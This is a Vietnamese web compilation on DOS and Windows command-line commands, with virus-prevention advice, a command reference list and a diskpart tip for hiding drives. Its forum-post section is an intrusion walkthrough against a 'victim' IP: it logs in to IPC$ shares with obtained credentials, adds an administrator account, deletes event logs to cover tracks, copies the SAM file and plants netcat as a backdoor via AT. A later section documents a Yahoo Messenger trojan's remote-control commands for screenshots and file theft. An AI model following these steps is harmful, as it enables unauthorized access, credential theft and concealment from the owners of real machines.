Các lệnh cơ bản trong dos

thì ổ cứng của máy này sẽ bị nhiễm VIRUS. Nếu một máy tính có ổ cứng đã bị nhiễm VIRUS, ta cho một đĩa mềm sạch vào ổ A và chạy nhưng không đóng nút chống ghi lại thì đĩa mềm sẽ bị nhiễm VIRUS, từ đĩa mềm này khi ta mang đĩa mềm sang các máy khác để chạy thì VIRUS sẽ lan sang máy khác.3.2. Nguyên tắc phòng ngừa VIRUS. Vì vật trung gian để lây VIRUS là đĩa mềm, để phòng VIRUS ta phải rất hạn chế dùng một đĩa mềm lạ. Nếu bắt buộc phải dùng thì ta kiểm tra VIRUS đĩa mềm lạ bằng các chương trình chống VIRUS trước khi sử dụng. Song điều đó không thể hoàn toàn tin tưởng vì các chương trình chống VIRUS chỉ có khả năng phát hiện và diệt những VIRUS mà chúng đã biết. Các VIRUS mới không phát hiện được. Các chương trình chống VIRUS của nước ngoài không thể phát hiện các VIRUS sản xuất trong nước. Cần kết hợp nhiều chương trình chống VIRUS và luôn cập nhật chương trình mới nhất.Khi mang đĩa mềm của mình đi chạy ở các nơi khác có ổ cứng thì phải bật lẫy chống ghi để tránh VIRUS xâm nhập vào đĩa. Hết sức lưu ý khi ghi thông tin từ máy khác vào đĩa của mình.Nếu trên máy có nhiều người sử dụng thì trước khi làm việc ta nên sử dụng các chương trình chống VIRUS để kiểm tra VIRUS trên đĩa cứng.Để phòng chống nên có một hệ thống sạch (không có virus) để khởi động máy từ ổ A, đĩa này ngoài các tệp cần thiết để khởi động máy còn cần có các tệp của DOS như: Format.com, Fdisk.exe, unformat.com, Undelete.com, Scandisk.exe. Đồng thời ta phải có các đĩa mềm chứa các chương trình chống virus với các phiên bản mới nhất bộ SCAN, FPROT, ATV, BKAV,D2… các chương trình này cũng phải lấy từ nguồn đáng tin cậy, các đĩa mềm luôn được dán nhãn bảo vệ.3.3. Một số triệu chứng khi máy nhiễm virus - Một số tệp có đuôi COM và EXE tự nhiên bị tăng thêm số byte, khi đó ta nghĩ máy nhiễm F-virus. Để biết điều đó ta nhờ kích thước của một số tệp quan trọng: command.com 54645 byte (của DOS6.22), foxpro.exe 411032 byte (forpro 2.6)- Tệp chương trình đuôi COM hoặc EXE không chạy hoặc sai.- Máy không khởi động được từ đĩa cứng hoặc không nhận biết được ổ cứng khi khởi động máy từ ổ đĩa mềm, khi đó ta nghi máy bị nhiễm B-virus. - Máy chạy bị treo.Tất nhiên các triệu chứng trên còn có thể là do lỗi phần cứng.3.4. Cách xử lý khi máy bị nhiễm virus. Khi máy bị nhiễm VIRUS chúng ta tiến hành các bước sau:1. Tắt hoàn toàn máy tính để loại virus ra khỏi bộ nhớ trong. Khởi động lại máy bằng đĩa mềm hệ thống từ ổ A.2. Sau khi thực hiện xong bước một máy nhận biết được ổ C thì thực hiện bước 3. Nếu máy không nhận được ổ C thì thực hiện bước 4:3. Chạy các chương trình kiểm tra và diệt virus. Sau khi kết thúc quá trình trên thì khởi động lại máy từ ổ cứng và làm việc bình thường.4. Chạy chương trình kiểm tra và sửa đĩa nếu như cần giữ lại thông tin trên đĩa cứng (NDD.EXE). Sau khi sao lưu dữ liệu nên làm theo các bước sau: a. Chạy FDISK.EXE để khởi tạo lại bảng Partition (FAT) cho ổ cứng.b. Chạy FORMAT.COM C: /S để định dạng lại ổ đĩa.c. Cài lại hệ điều hành và ứng dụng cần thiết.d. Sao dữ liệu lại ổ đĩa và làm việc bình thường.Nếu như trên ổ đĩa không cần sao lưu dữ liệu lại thì có thể chạy ngay FDISK.EXE mà không cần chạy qua NDD.EXE. 1. Lệnh Ping : Cú pháp: Code: ping ip/host [/t][/a][/l][/n] - ip: địa chỉ IP của máy cần kiểm tra; host là tên của máy tính cần kiểm tra. Người ta có thể sử dụng địa chỉ IP hoặc tên của máy tính. - Tham số /t: Sử dụng tham số này để máy tính liên tục "ping" đến máy tính đích, cho đến khi bạn bấm Ctrl + C - Tham số /a: Nhận địa chỉ IP từ tên host - Tham số /l : Xác định độ rộng của gói tin gửi đi kiểm tra. Một số hacker sử dụng tham số này để tấn công từ chối dịch vụ một máy tính (Ping of Death - một loại DoS), nhưng tôi nghĩ là hacker có công cụ riêng để ping một gói tin lớn như thế này, và phải có nhiều máy tính cùng ping một lượt. - Tham số /n : Xác định số gói tin sẽ gửi đi. Ví dụ: ping 174.178.0.1/n 5 Công dụng : + Lệnh này được sử dụng để kiểm tra xem một máy tính có kết nối với mạng không. Lệnh Ping sẽ gửi các gói tin từ máy tính bạn đang ngồi tới máy tính đích. thông qua giá trị mà máy tính đích trả về đối với từng gói tin, bạn có thể xác định được tình trạng của đường truyền (chẳng hạn: gửi 4 gói tin nhưng chỉ nhận được 1 gói tin, chứng tỏ đường truyền rất chậm (xấu)). Hoặc cũng có thể xác định máy tính đó có kết nối hay không (Nếu không kết nối,kết quả là Unknow host).... cac lenh trong dos 2. Lệnh Tracert : Cú pháp : Code: tracert ip/host Công dụng : + Lệnh này sẽ cho phép bạn "nhìn thấy" đường đi của các gói tin từ máy tính của bạn đến máy tính đích, xem gói tin của bạn vòng qua các server nào, các router nào... Quá hay nếu bạn muốn thăm dò một server nào đó.3. Lệnh Net Send, gởi thông điệp trên mạng (chỉ sử dụng trên hệ thống máy tình Win NT/2000/XP): Cú pháp: Net send ip/host thông_điệp_muốn_gởi Công dụng: + Lệnh này sẽ gửi thông điệp tới máy tính đích (có địa chỉ IP hoặc tên host) thông điệp: thông_điệp_muốn_gởi. + trong mạng LAN, ta có thể sử dụng lệnh này để chat với nhau. Trong phòng vi tính của trường tui thường dùng lệnh này để ghẹo mọi người! Bạn cũng có thể gởi cho tất cả các máy tính trong mạng LAN theo cấu trúc sau :Code: Net send * hello!I'm pro_hacker_invn 4. Lệnh Netstat : Cú pháp: Code: Netstat [/a][/e][/n] - Tham số /a: Hiển thị tất cả các kết nối và các cổng đang lắng nghe (listening) - Tham số /e: hiển thị các thông tin thống kê Ethernet - Tham số /n: Hiển thị các địa chỉ và các số cổng kết nối... Ngoải ra còn một vài tham số khác, hãy gõ Netstat/? để biết thêm Công dụng : + Lệnh Netstat cho phép ta liệt kê tất cả các kết nối ra và vào máy tính của chúng ta. 5. Lệnh IPCONFIG : Cú pháp: Code: ipconfig /all Công dụng: + Lệnh này sẽ cho phép hiển thị cấu hình IP của máy tính bạn đang sử dụng, như tên host, địa chỉ IP, mặt nạ mạng... 6. Lệnh FTP (truyền tải file): Cú pháp: Code: ftp ip/host Nếu kết nối thành công đến máy chủ, bạn sẽ vào màn hình ftp, có dấu nhắc như sau: Code: ftp>_ Tại đây, bạn sẽ thực hiện các thao tác bằng tay với ftp, thay vì dùng các chương trình kiểu Cute FTP, Flash FXP. Nếu kết nối thành công, chương trình sẽ yêu cầu bạn nhập User name, Password. Nếu username và pass hợp lệ, bạn sẽ được phép upload, duyệt file... trên máy chủ. Một số lệnh ftp cơ bản: -cd thu_muc: chuyển sang thư mục khác trên máy chủ - dir: Xem danh sách các file và thư mục của thư mục hiện thời trên máy chủ - mdir thu_muc: Tạo một thư mục mới có tên thu_muc trên máy chủ - rmdir thu_muc: Xoá (remove directory) một thư mục trên máy chủ - put file: tải một file file (đầy đủ cả đường dẫn. VD: c:\tp\bin\baitap.exe) từ máy bạn đang sử dụng lên máy chủ. - close: Đóng phiên làm việc - quit: Thoát khỏi chương trình ftp, quay trở về chế độ DOS command. Ngoài ra còn một vài lệnh nữa, xin mời các bạn tự tìm hiểu. Công dụng : + FTP là một giao thức được sử dụng để gửi và nhận file giữa các máy tính với nhau. Windows đã cài đặt sẵn lệnh ftp, có tác dụng như một chương trình chạy trên nền console (văn bản), cho phép thực hiện kết nối đến máy chủ ftp 7. Lệnh Net View : Cú pháp: Code: Net View [\\computer|/Domain[:ten_domain]] Công dụng: + Nếu chỉ đánh net view [enter], nó sẽ hiện ra danh sách các máy tính trong mạng cùng domain quản lý với máy tính bạn đang sử dụng. + Nếu đánh net view \\tenmaytinh, sẽ hiển thị các chia sẻ tài nguyên của máy tính tenmaytinh . Sau khi sử dụng lệnh này, các bạn có thể sử dụng lệnh net use để sử dụng các nguồn tài nguyên chia sẻ này.8. Lệnh Net Use : Cú pháp: Code: Net use \\ip\ipc$ "pass" /user:"xxx" - ip: địa chỉ IP của victim. - xxx: user của máy victim - pass: password của user Giả sử ta có đc user và pass của victim có IP là 68.135.23.25 trên net thì ta đã có thể kết nối đến máy tính đó rùi đấy! Ví dụ: user: vitim ; pass :12345 . Ta dùng lệnh sau: Code: Net use \\68.135.23.25\ipc$ "12345" /user:"victim" Công dụng: + kết nói một IPC$ đến máy tính victim (bắt đầu quá trình xâm nhập). 9. Lệnh Net User : Cú pháp: Code: Net User [username pass] [/add] - Username : tên user cấn add - pass : password của user cần add Khi đã add đc user vào rùi thì ta tiến hành add user này vào nhóm administrator. Code: Net Localgroup Adminstrator [username] [/add] Công dụng: + Nếu ta chỉ đánh lệnh Net User thì sẽ hiển thị các user có trong máy tính. + Nếu ta đánh lệnh Net User [username pass] [/add] thì máy tính sẽ tiến hành thêm một người dùng vào. Ví dụ: ta tiến hành add thêm một user có tên là xuanhoa , password là :banvatoi vào với cấu trúc lệnh như sau: Code: Net User xuanhoa banvatoi /add Sau đó add user xuanhoa vào nhóm adminnistrator Code: Net Localgroup Administrator xuanhoa /add10. Lệnh Shutdown: Cú pháp: Code: shutdown [-m \\ip] [-t xx] [-i] [-l] [-s] [-r] [-a] [-f] [-c "commet] [-d upx:yy] (áp dụng cho win XP) - Tham số -m\\ip : ra lệnh cho một máy tính từ xa thực hiên các lệnh shutdown, restart,.. - Tham số -t xx : đặt thời gian cho việc thực hiện lệnh shutdown. - Tham số -l : logg off (lưu ý ko thể thực hiện khi remote) - Tham số -s : shutdown - Tham số -r : shutdown và restart - Tham số -a : không cho shutdown - Tham số -f : shutdown mà ko cảnh báo - Tham số -c "comment" : lời cảnh báo trước khi shutdown - Tham số -d upx:yy : ko rõ Code: shutdown \\ip (áp dụng win NT) Để rõ hơn về lệnh shutdown bạn có thể gõ shutdown /? để được hướng dẫn cụ thể hơn! Công dụng: + Shutdown máy tính. 11. Lệnh DIR : Cú pháp: Code: DIR [drive:][path][filename] Lệnh này quá căn bản rùi, chắc tui khỏi hướng dẫn, để rõ hơn bạn đánh lệnh DIR /? để được hướng dẫn. Công dụng: + Để xem file, folder. 12. Lệnh DEL : Cú pháp: Code: DEL [drive:][path][filename] Lệnh này cũng căn bản rùi, ko phải nói nhìu. Công dụng: Xóa một file, thông thường sau khi xâm nhập vào hệ thống, ta phái tiến hành xóa dấu vết của mình để khỏi bị phát hiện.Sau đây là những files nhật ký của Win NT:Code : del C:\winnt\system32\logfiles\*.* del C:\winnt\ssytem32\config\*.evt del C:\winnt\system32\dtclog\*.* del C:\winnt\system32\*.log del C:\winnt\system32\*.txt del C:\winnt\*.txt del C:\winnt\*.log13. Lệnh tạo ổ đĩa ảo trên computer: Cú pháp: Code: Net use z: \\ip\C$ ( hoặc là IPC$ ) - Z là của mình...còn C$ là của Victim Công dụng: Tạo 1 đĩa ảo trên máy tính (lệnh này tui ko rõ nên ko thể hướng dẫn chi tiết đc) 14. Lệnh Net Time : Cú pháp: Code: Net Time \\ip Công dụng: + Cho ta biết thời gian của victim, sau đó dùng lệnh AT để khởi động chương trình. 15. Lệnh AT: Cú pháp: Code: AT \\ip Công dụng: + Thông thường khi xâm nhập vào máy tính victim khi rút lui thì ta sẽ tặng quà lưu niệm lên máy tính victim, khi đã copy troj hoặc backdoor lên máy tính rùi ta sẽ dùng lệnh at để khởi động chúng. Ví dụ: ở đây tui có con troj tên nc.exe (NC là từ viết tắc của NETCAT....nó là một telnet server với port 99) và đc copy lên máyvictim rùi. Đầu tiên ta cần biết thời gian của victim có IP là : 68.135.23.25 . Code: Net Time \\68.135.23.25 Bây h nó sẽ phản hồi cho ta thời gian của victim, ví dụ : 12:00. Code: AT \\68.135.23.25 12:3 nc.exe Đợi đến 12:3 là nó sẽ tự chạy trên máy nạn nhân và chúng ta có thể connected đến port 99. 16. Lệnh Telnet: Cú pháp: Code: telnet host port Gõ telnet /? để biết thêm chi tiết. Nhưng nếu như máy victim đã dính con nc rồi thì ta chỉ cần connect đến port 99 là OKie Code: telnet 68.135.23.25 99 Công dụng: + Kết nối đến host qua port xx 17. Lệnh COPY: Cú pháp: Code: COPY /? Dùng lệnh trên để rõ hơn! Công dụng: + Copy file, tui khỏi nói thêm nhé. Ví dụ:chúng ta copy files index trên ổ C của mình lên ổ C của 127.0.0.1 Code: Copy Index.html \\127.0.0.1\C$\index.html nếu bạn copy lên folder winNt Code: Copy index.html \\127.0.0.1\admin$\index.html muốn copy files trên máy victm thì bạn gõ vào : Code: Copy \\127.0.0.1\Admin$\repair\sam._c:\ 18. Lệnh SET: Cú pháp: Code: SET Công dụng: + Displays, sets, or removes cmd.exe enviroment variables. 19. Lệnh Nbtstat: Cú pháp: Code: Nbtstat /? Gõ lệnh trên để rõ hơn về lệnh này. Công dụng: + Display protocol statistic and curent TCP/IP connections using NBT (netbios over TCP?IP) Trên đây là một số hiểu biết hạn hẹp của em về các lệnh CMD, em đã đọc được từ rất nhiều nguồn khác nhau, nay tổng hợp lại cho mọi người tham khảo. Có một số lệnh em vẫn chưa hiểu cấu trúc lệnh và chưa có điều kiện để thực hành thử nên ko hướng dẫn kỹ. Ai biết thì góp ý nhé! Mong các pro đừng cười! Nếu thấy bài viết của em hay thì làm ơn thank cho một cái nhé Bao gồm những lệnh cho phép bạn thực hiện các thao tác cơ bản đối với tập tin, thư mục và các ổ đĩa ... như tạo mới, chỉnh sửa, thiết lập các thuộc tính, sao chép, di chuyển, đổi tên, xóa .... ASSOC Chỉnh sửa hoặc thiết lập mô tả cho một kiểu tập tin ATTRIB Thiết lập hoặc gỡ bỏ một thuộc tính của tập tin CACLS Phân quyền truy cập cho tập tin và thư mục CHKDSK Kiểm tra và sửa lổi các ổ đĩa CHKNTFS Thiết lập chế độ tự kiểm tra các phân vùng ổ cứng CIPHER Hiển thị hoặc chỉnh sửa sự mã hóa các tập tin, thư mục trên phân vùng dùng NTFS COMP So sánh tập tin COMPACT Hiển thi hoặc chỉnh sửa sự nén tập tin, thư mục trên phân vùng NTFS CONVERT Chuyển đổi các phân vùng sang NTFS COPY Sao chép các tập tin COPY CON Tạo một tập tin DEL Xóa tập tin DIR Hiển thị danh sách tập tin, thư mục EDIT Trình soạn thảo tập tin EDLIN Trình soạn thạo tập tin giản đơn EXE2BIN Chuyển đổi tập tin .exe sang tập tin nhị phân. EXPAND Giải nén tập tin *.cab FC So sánh và hiển thị sự khác biệt giữa 2 tập tin FIND Tìm một chuỗi văn bản trong một tập tin FINDSTR Tìm một chuỗi văn bản trong một tập tin nâng cao FOR Thực hiện một lệnh đối với mỗi tập tin trong một tập hợp các tập tin FORMAT Định dạng đĩa FTYPE Chỉnh sửa hoặc hiển thị lệnh để gọi ứng dụng mở cho một kiểu tập tin. LABEL Tạo nhãn cho các đĩa MD Tạo mới thư mục MOUNTVOL Tạo mới, xóa hoặc liệt kê số hiệu của đĩa MOVE Di chuyển các tập tin PRINT In một tập tin văn bản RECOVER Phục hồi các thông tin trên đĩa hỏng REN Đổi tên tập tin REPLACE Thay thế các tập tin SORT Sắp xếp nội dung dữ liệu bên trong tập tin SUBST Tạo một ổ ảo gắn với một thư mục trên máy TREE Hiển thị sơ đồ cây thư mục TYPE Xem nội dung một tập tin văn bản VOL Hiển thị số serial của đĩa XCOPY Sao chép cả tập tin và thư mục SYSTEMBao gồm những lệnh cho phép thay đổi thiết lập, hiển thị thông tin hệ thống Windows và hệ thống phụ MS-Dos trên Windows. APPEND Cho phép các ứng dụng tìm kiếm dữ liệu trong các thư mục chỉ định AT Lập lịch để thực hiện một lệnh tự động nhờ dịch vụ Scheduler. CALL Gọi thi hành một tập lệnh CD Chuyển đổi thư mục hện hành. CHCP Thiết lập ngôn ngữ sử dụng cho hệ thống CMD Khởi động một sử kiện mới của trình biên dịch lệnh. DATE Hiển thị hoặc thiết lập ngày hệ thống DEBUG Thực hiện bẩy lỗi một ứng dụng Dos. DIVICE Tải vào bộ nhớ các trình điều khiển thiết bị DEVICEHIGH Tải ác trình điều khiển thiết bị vào vùng nhớ bậc cao. DOSKEY Gọi ứng dụng Doskey DOSONLY Ngăn chạy một ứng dụng không phải là ứng dụng Dos FCBS Chỉ định số khối điều khiển tập tin được mở... FILES Chỉ định số tập tin có thể truy cập cùng lúc. FORCEDOS Khởi động một ứng dụng Dos GOTO Chuyển đến một vị trí trong tập tin lệnh HELP Hiển thị trợ giúp IF Thực hiện một lệnh theo điều kiện INSTALL Tải một ứng dụng vào bộ nhớ LOADFIX Tải một ứng dụng vào vùng nhớ phía trên 64KB đầu tiên của vùng nhớ quy ước LOADHIGH Tải một ứng dụng vào vùng nhớ bậc cao MEM Hiển thị về bộ nhớ được cấp phát cho hệ thống con MS-DOS. POPD Khôi phục lại thư mục hiện tại cho hệ thống Dos PUSHD Lưu trữ thư mục hiện tại và chuyển sang thư mục khác. RUNAS Chạy một ứng dụng với bằng quyền của người dùng khác SET Hiển thị, thiết lập hoặc xóa một biến số môi trường. SETVER Thiết lập số phiên bản Ms-Dos cho các ứng dụng. SHELL Chạy một trình biên dịch thay thế TIME Thiết lập hoặc hiển thị giờ hệ thống VERSION Hiển thị số phiên bản của hệ điều hành. NETWORK Bao gồm những lệnh rất hữu ích nếu bạn là một nhà quản trị mạng, có những lệnh giúp bạn làm việc nhanh hơn so với dùng giao diện của HĐH Windows. ATMADM Theo dõi các kết nối ATM EVNTCMD Hiển thị các sự kiện của dịch vụ SNMPFINGER Hiển thị thông tin người dùng hệ thống chạy dịch vụ Finger FTP Khởi động cửa số kết nối để truyền tập tin HOSTNAME Hiển thị tên máy IPCONFIG Hiển thị thông tin về địa chỉ IP, subnet mask... IRFTP Truyền tập tin qua cổng hồng ngoại LPQ Hiển thị trạng thái chuỗi in LPR In một tập tin trên mạng NET ACCOUNTS Các thiết lập về tài khoản ngừơi dùng NET COMPUTER Thiết lập cho các máy trên tên miền. NET CONFIG Hiển thị, hoặc cấu hình cho các dịch vụ đang chạy NET CONTINUE Phục hồi một dịch vụ bị tạm dừng NET FILE Hiển thị tất cả các tập tin sẵn sàng chia sẽ trên một máy. NET GROUP Thiết lập cho các nhóm trên mạng NET HELP Hiển thị các giúp đỡ cho các lệnh về mạng NET HELPMSG Giải thích cho một mã lỗi của Windows 2000 NET LOCALGROUP Thiết lập cho các nhóm nội trên máy. NET NAME Thiết lập các biệt danh trong mạng NET PAUSE Tạm dừng một dịch vụ NET PRINT Thiết lập công việc in ấn NET SEND Gửi một thông điệp trên mạng nội bộ NET SESSION Cấu hình cho một phiên làm việc trên mạng NET SHARE Chia sẽ tài nguyên trên máy NET START Khởi động một dịch vụ trên máy NET STATISTICS Hiển thị tình hình hoạt động của các thành phần của dịch vụ Wortstration và Server NET STOP Dừng hoạt động một dịch vụ NET TIME Đồng bộ hóa thời gian hệ thống của máy cục bộ với máy chủ thời gian NET USE Kết nối đến một tài nguyên chia sẽ trên mạng NET USER Thiết lập cho một tài khoản người dùng trên mạng. NET VIEW Hiển thị tài nguyên được chia sẽ trên mạng NETSTAT Hiển thị tình hình hoạt động của TCP/IP PATHPING Phân tích chi tiết đường truyền của gói dữ liệu trên mạng PING Kiểm tra kết nối với một máy trên mạng ROUTE Xác định đường đi của một gói dữ liệu trên mạng TRACERT Công cụ phân tích đường đi của một gói dữ liệu. DOS PROMPT Bao gồm những lệnh cho phép bạn thực hiện các thao tác để thay đổi giao diện cũng như các thiết lập đối với cửa sổ lệnh Dos CLS Xóa màn hình cửa sổ lệnh CMD Khởi động một sự kiện mới của trình biên dịch Dos. COLOR Thiết lập màu nền, màu chữ của cửa sổ lệnh ECHO Hiển thị một dòng thông điệp trên cửa sổ lệnh EXIT Thoát khỏi một sự kiện của trình biên dịch lệnh MORE Tùy biến màn hình xuất dữ liệu trên cửa sổ lệnhz PATH Thiết lập đường dẫn định hướng cho các tập tin lệnh. PAUSE Tạm thời dừng thực hiện các lệnht trong tập tin lệnh PROMPT Thay đổi các thuộc tính của cửa sổ lệnh REM Thêm dòng chú thích trong tập tin lệnh START Khởi động một cửa sổ mới để thực hiện 1 lệnh TITLE Thay đổi tiêu đề cửa sổ lệnh ----------------------------------------- Các kiểu lệnhTrong phiên bản này, đây là một số câu lệnh khởi đầu cho việc kiểm soát./Result Kết quả của quá trình thực thi sẽ được gửi về ngay sau khi quá trình hoàn tất. Nhưng nếu như nội dung của kết quả gửi về quá dài (nhiều hơn 200 ký tự), nó sẽ được gửi lần lượt, liên tục. Bởi vì Yahoo! Messenger không cho phép nội dung có số ký tự vượt quá giới hạn đã định sẵn./cmd - Tương tự MS-DOS Command Prompt. Bạn có thể thực thi lệnh DOS trên máy bị kiểm soát, và nhận được kết quả. Các lệnh như: DIR , VER , VOL , IPConfig , Netstat , WHOAMI v.v … đều có thể được sử dụng như lệnh DOS.Ví dụ: /cmd dir C:\*.txt]Các kiểu lệnh thực thi DOSBạn có thể thực thi một số lệnh DOS đặc biệt để khai thác thông tin từ phía máy bị kiểm soát./cmd dir - Xem danh sách các tập tin và thư mục. Bạn có thể sử dụng linh động các thông số để khai thác thông tin cụ thể nhất. Ví dụ: /cmd dir /on , /cmd dir *.txt/cmd ipconfig - Lấy thông tin truy cập. Câu lệnh có chức năng khai thác thông tin từ thiết bị mạng đang sử dụng trên máy bị kiểm soát. Nó sẽ truy ra tên thiết bị mạng, địa chỉ IP, cổng vào, DNS Server … v.v/cmd tasklist - Lấy danh sách các chương trình đang hoạt động. Tương tự như Windows Task Manager. Nhưng dưới giao diện DOS./cmd whoami - Cung cấp thông tin để xác định máy qua mạng. Thông tin gửi về gồm : TÊN MIỀN / TÊN NHÓM MẠNG , Tên máy tính và tên truy cập máy tính sử dụng WINDOWS. Lưu ý : Câu lệnh này chỉ hoạt động với Windows Server 2003. Không hỗ trợ trên Windows XP./cmd netstat - Hiển thị hệ thống mạng và tất cả kết nối hiện có trên máy tính. Để đạt tốc độ nhanh, sử dụng /cmd netstat -naKhai thác thông tin của máy tínhChỉ việc sử dụng câu lệnh này, bạn có thể lấy được thông tin chính từ máy đối tượng./IP - cho biết địa chỉ IP. Một máy tính có thể có nhiều hơn một địa chỉ IP khi hoạt động. Ví dụ : bạn có một tài khoản để kết nối internet, và máy tính của bạn đang nằm trong một khu vực kết nối mạng nội bộ (LAN). Vì vậy bạn sẽ có 2 địa chỉ IP ấn định trong máy tính. TroMessenger sẽ gửi toàn bộ địa chỉ IP hiện hành trên máy tính./osname - cho bạn biết đầy đủ về tên của Hệ điều hành Windows và tên các phiên bản cập nhật. Ví dụ : Windows Server 2003 Service Pack 1./computername - cho biết tên thiết lập của máy trên hệ thống mạng. Các máy tính nhận dạng nhau qua tên này. Nếu máy tính hiện thời chưa được kết nối, không thành vấn đề, nội dung sẽ được gửi ngay sau đó./winusername - cho biết tài khoản quản lý sử dụng Windows. Đặc biệt trong Windows XP, có thể sẽ có nhiều tài khoản sử dụng cùng một máy. Và thông tin này sẽ được thay đổi mỗi khi người sử dụng truy cập.Nhưng với Windows Server 2003 tên này luôn được trả về Administrator. Tuy nhiên dân Admin đã biết chuyển tên tài khoản. nhưng thông thường đa số Admin lại quên làm./yahooid - Cho biết tên Yahoo ID của người cuối cùng đang bị kiểm soát.Những chức năng chính/Help - Hiển thị các lệnh hợp lệ của TroMessenger. Sẽ có nhiều câu lệnh hơn trong những phiên bản mới. Lúc đó bạn chỉ cần sử dụng lệnh này./screenshot - Cho bạn ảnh chụp màn hình của máy tính đối tượng.Nghi vấn - Yahoo! Messenger là chương trình viết bằng ngữ lệnh, làm sao TroMessenger có thể cho tôi xem ảnh chụp ?Giải đáp - TroMessenger cho bạn ảnh ngay tức khắc. Có nghĩa là : chụp sao lại màn hình, sau đó tải lên mạng, và gửi đến bạn một liên kết để xem ảnh./download - Tải về một thứ gì đó và lưu lại trên máy đối tượng. Bạn sẽ được thông báo khi quá trình hoàn tất.Câu lệnh: /download “” “C:\SavedFile.zip”Chú ý: Bạn phải sử dụng dấu ngoặc (”). Nếu quên, quá trình tải về sẽ không thực hiện được./restart - Khởi động lại máy tính.Chú ý: Nếu bạn chạy thử nghiệm trên máy tính của bạn, bạn sẽ bị khởi động ngay lập tức mà không có tín hiệu thông báo nào. Và những chương trình trên máy sẽ bị mất. Hãy cẩn thận khi sử dụng câu lệnh này. Tương tự như Shutdown command./shutdown - Tắt máy tính. (Lặp lại chú ý)/time , /date - Hiển thị ngày và giờ./ejectcd - Mở ổ đĩa CD-ROM./closecd - Đóng ổ đĩa CD-ROM sau khi mở./view - Hiển thị nội dung của văn bản. Lưu ý: nếu văn bản nhiều hơn … ký tự, nó sẽ được ngắt ra thành nhiều phần để gửi liên tiếp nhau./getfile - tải bất kỳ tập tin nào lên mạng và gửi liên kết tải về cho bạn. Được sử dụng khi bạn muốn đọc những tập tin không phải là tập tin văn bản từ máy đối tượng/status , /idle , /busy - Đặt tín hiệu hiển thị cho địa chỉ ảo. Như là tín hiệu Busy hoặc Idle Icons bên cạnh ID.Câu lệnh ví dụ :/status Toiyeuem./idle Dangantoi./busy Hiendangban./cancel - Đình chỉ câu lệnh đang thực hiện. Ví dụ khi bạn muốn xem một tập tin văn bản có dung lượng 1MB. Và nội dung đang được gửi đi từng phần, nhưng rồi bạn cảm thấy chán và không muốn xem nữa và muốn gửi một lệnh khác. Chỉ cần dùng lệnh /cancel là xong./login - Đăng nhập tài khoản sử dụng quản lý. Mỗi khi TroMessenger khởi động, nếu bạn không được xác nhận là chủ quản lý của chương trình, nhưng bạn biết mật khẩu, bạn sẽ sử dụng /login your password để bắt đầu điều khiển chương trình. Không sử dụng dấu ngoặc cho mật khẩu… ----------------------------------- thủ thuật với các lếnh trong dos Nguồn bài viết: hôm nay tôi xin hướng dẫn cho các bạn một thủ thuật nhỏ này .bạn biết đó nhiều khi trong máy tính của mình có rất nhiều tài liệu quan trọng mà bạn ko muốn ai đó động đến tài liệu đó thì bạn có thể làm theo cách này.đó là sử dụng lệnh dos để giấu ổ.Rất thú vị đócâu lệnh dos trong việc giấu một ổ đĩa:cmd-->tại dấu nhắc bạn viết lệnh diskpart sau đó tại dòng lênh: "diskpart"ban viết tiếp lệnh :"list volume "-dùng để liệt kê danh sách các ổgiả sử bây giờ bạn muốn giẩu ổ d thì bạn dùng tiếp lệnh sau "select volume 1"-lệnh này được sử dụng để tham chiếu đến ổ đó.khi đã lựa chọn được ổ đĩa ta sử dụng tiếp lệnh:"remove letter d"-lệnh này dùng để làm ẩn ổ d đinếu bạn muốn khôi phục lại thì bạn dùng lệnh sau :"assign letter d".Đối với các ổ còn lại thì bạn cũng thực hiện tương tự như vây.Nhưng lưu ý bạn ko thể làm ẩn ổ C được nhá..Còn đây là một số câu lênh dos khác được sử dụng trong mạng.-lệnh ping (kiểm tra tốc độ mạng): bạn ping đến tên miên dnsví du: ping 203.162.0.11 -t-kiểm tra dữ liệu truyền và kết nối trong mạng lan có tốt không thì bạn có thể sử dụng lếnh sau:chú ý là bạn phải biết đia chỉ moderm trong mạng lan của bạn:ví dụ moderm của nhà tôi là:192.168.1.254thì bạn : ping 192.168.1.254 -tNGoài ra bạn sử dụng lệnh ping sẽ biểt được địa chỉ của trang webbạn ping trực tiếp đến ngay trang web đó:ví dụ : ping www.sinhvienit.net.Đ